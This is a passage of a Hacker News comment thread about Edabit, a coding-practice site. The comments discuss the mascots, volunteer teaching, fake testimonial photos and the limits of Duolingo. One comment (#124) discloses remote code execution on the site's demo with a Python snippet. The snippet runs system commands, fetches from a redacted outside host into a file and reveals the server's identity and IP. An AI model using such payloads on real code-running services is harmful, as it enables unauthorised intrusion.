Hey man. Nice App. How did you created the Mascots ? Or Outsourced it? Any leads and cost related?
Show HN: Edabit – Like Duolingo for Learning to Code
121–130 of 134 posts
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#122Earlier quoted context omitted.
How do you teach? As an instructor at a school or tutoring on the side?
I work with my local library to hold coding office hours (Should be very easy to set up, they really want to become more technically savvy but the only volunteers they could find is instructors trying to teach microsoft word) I have my own curriculum that I've built over the years and the students ultimately end up building a product that they launch (hopefully). This year I got to teach 20 students and so far 14 hav…
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#123Earlier quoted context omitted.
Lots of people using the site right now. Usually it's very fast.
It sounds like the validation should be running on the client side and not in the cloud.
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#124Good job. However, I was able to run the following on your machine (on the publicly available demo page): def hello(): import os print(os.system("whoami")) print(os.system("hostname")) print(os.system("curl http://redacted/ > ./owned.txt")) print(os.system("curl -s http://whatismyip.akamai.com/") ) print(os.system("cat ./owned.txt")) print(os.system("ping -c 1 8.8.8.8")) Results: codewarrior 5a8eb7db8f0e 162.243.103.…
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#125I just reverse image searched all three of their testimonial photos all all come from random .edu faculty pages with completely different names. They also show up on random Twitter profiles and bandcamp pages. Not sure why they’re using fake testimonial photos but that seems rather scummy.
I’m confused as to how anyone would think this is alright to do.
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#126Re: Show HN: Edabit – Like Duolingo for Learning to Code
#127Re: Show HN: Edabit – Like Duolingo for Learning to Code
#128Earlier quoted context omitted.
Look, as you mentioned, you just don't know what you are talking about to extrapolate what you want explained. Use Duolingo for 5 minutes like the rest of us and get with the program.
I did that. I took the initial test for Japanese, where I answered correctly for sentences I already understood or where I was only missing a single word I could guess by elimination. Given multiple options I couldn't distinguish, I messed up as it should be. Based on the test results, I was skipped past 23 of the 40 topics I can see in the course. Considering that I've been learning for only three months, that makes…
It becomes more apparent when you realize these apps are not smart. They were novel at one point, and maybe you can pick up a phrase to catch a native speaker off guard.
Duolingo is using humans to translate web content that algorithms are unsure about. This is the same founder of reCaptcha, who uses captcha's to use humans to tell robots about what the robots are unsure of.
Memrise, on the other hand, just takes the "87% most used phrases" and tries to get you to memorize the.
They have zero holistic approach to any of the languages they offer. You will never learn tense, language-specific concepts and rules, idioms that break all the rules, or whatever locals just say.
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#129Earlier quoted context omitted.
Except that hasn't been true for years in certain circumstances, particularly where the value of an app running user-created code is educational in nature. See Pythonista, Codea, Swift Playgrounds, or hell, Shortcuts.
Shortcuts, and Swift Playgrounds even more so, have been granted private entitlements by Apple to function.
Re: Show HN: Edabit – Like Duolingo for Learning to Code
#130Earlier quoted context omitted.
How does the url http://redacted/ work? I've never seen a url without a tld on the end. Could I register the domain http://foo ?
> "How does the url http://redacted/ work?" I apologize for the confusion. I used an actual server there (ie. http://somename.com ) but chose to redact the actual URL from this post.